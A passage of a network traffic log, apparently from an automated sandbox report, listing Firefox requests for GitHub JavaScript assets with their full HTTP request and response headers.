                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 03 Jan 2025 21:10:51 GMT
                          etag: "0x8DD2C3B1AB7B5CF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 419741
                          x-served-by: cache-iad-kjyo7100116-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 33, 13945
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: e616cda3af8b423990f240b9313650d4eb34ca99
                          content-length: 5794
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 09 Dec 2024 18:22:05 GMT
                          etag: "0x8DD187E625ACB6B"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kiad7000085-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 2, 15031
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6493be6f882304fe47ede56aa11e52e7eeb65380
                          content-length: 4645
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 25 Nov 2024 14:39:52 GMT
                          etag: "0x8DD0D5F05CBAB3B"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kiad7000130-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 20, 15088
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: d4bddfa66916bc692bb51e5fe4b08da25d9bbbff
                          content-length: 6786
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 00:52:41 GMT
                          etag: "0x8DD02B4500C5DFD"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kiad7000164-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 22, 14964
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 9ffa023218f0ee1502f3634e0c3c6a62e739bc70
                          content-length: 4311
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 25 Nov 2024 15:32:27 GMT
                          etag: "0x8DD0D665E0F9ED8"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kcgs7200078-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 15, 15061
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: f7f99482a54f74d699a43097c9f39501a41f63e9
                          content-length: 5379
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 10 Dec 2024 19:56:20 GMT
                          etag: "0x8DD1954B7817C15"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kjyo7100066-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 19, 15126
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: efc375f7e87811052c259493f4e397921965a05c
                          content-length: 3683
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-f0c8a795d1fd.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-f0c8a795d1fd.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 16 Jan 2025 17:15:14 GMT
                          etag: "0x8DD36515792307E"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932134
                          x-served-by: cache-iad-kjyo7100170-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16821
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: cf2ca48c9d720cb8f158ae7111c21a2b09b73e7b
                          content-length: 27489
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/github-elements-ed51bf4a426a.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/github-elements-ed51bf4a426a.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:08 GMT
                          etag: "0x8DD34DA60C70F15"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kjyo7100039-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16693
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 86963e2f03b0508199743aff2341c25894267764
                          content-length: 9522
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/element-registry-bfccf829ef3e.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/element-registry-bfccf829ef3e.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 16 Jan 2025 01:08:29 GMT
                          etag: "0x8DD35CA49AEA032"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kjyo7100125-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 14166
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a9c23fda195287eadf138eeca86f37346925f344
                          content-length: 7917
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Wed, 15 Jan 2025 21:47:51 GMT
                          etag: "0x8DD35AE42915564"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 520350
                          x-served-by: cache-iad-kcgs7200062-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 26, 17497
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 8505e7de79e98df2fb6e3687ee4806f26f6dcfda
                          content-length: 4972
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 00:52:41 GMT
                          etag: "0x8DD02B4500E579D"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kjyo7100066-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 14999
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 2dc06703c1d9df013e59922c9a605607d4a0dedf
                          content-length: 3918
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 00:52:41 GMT
                          etag: "0x8DD02B44FAF168F"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kiad7000037-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 5, 15030
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 7755f52d3e4f8049381d1d1552d91271a7571805
                          content-length: 2385
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:17 GMT
                          etag: "0x8DD15446030C279"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1132202
                          x-served-by: cache-iad-kiad7000040-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15384
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: e625faa9a1da794054050609241b5ce9d797cae2
                          content-length: 18635
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 08 Aug 2024 18:12:13 GMT
                          etag: "0x8DCB7D5A12F3F7D"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kcgs7200153-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 14893
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 8bb2c90b49c89417996125a2b10e3f9f53039432
                          content-length: 3816
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 00:52:40 GMT
                          etag: "0x8DD02B44F3EF886"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kcgs7200145-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 15074
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: f46bf4736316d5a95324a93e75158d35254460e4
                          content-length: 4851
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-833249ee3034.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-833249ee3034.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:17 GMT
                          etag: "0x8DD1544602F3D8E"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167517
                          x-served-by: cache-iad-kiad7000100-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 33, 15383
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a50ad7198c9db37feb4863355433671ca374dace
                          content-length: 19397
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-0d1db422e5cc.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_updatable-content_updatable-content_ts-0d1db422e5cc.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:28 GMT
                          etag: "0x8DD34DA6C42C0A1"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kjyo7100031-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16665
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 151b50a4e7f5e3d63775773cad9c47a1e391a7ff
                          content-length: 3405
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-cab6164e492b.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-cab6164e492b.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:30:55 GMT
                          etag: "0x8DD34DA5901CA43"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kiad7000107-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16687
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: d378abde8f9341cacaf43933ee7489cedd5fb930
                          content-length: 4457
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-83e480198629.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-83e480198629.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:30:55 GMT
                          etag: "0x8DD34DA58F7C360"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kcgs7200126-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16620
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: c21cb49a533f7bc25516ba3f3646c707e55b32af
                          content-length: 3362
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-5f1192bdc996.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-5f1192bdc996.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 16 Jan 2025 01:08:20 GMT
                          etag: "0x8DD35CA44A93600"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
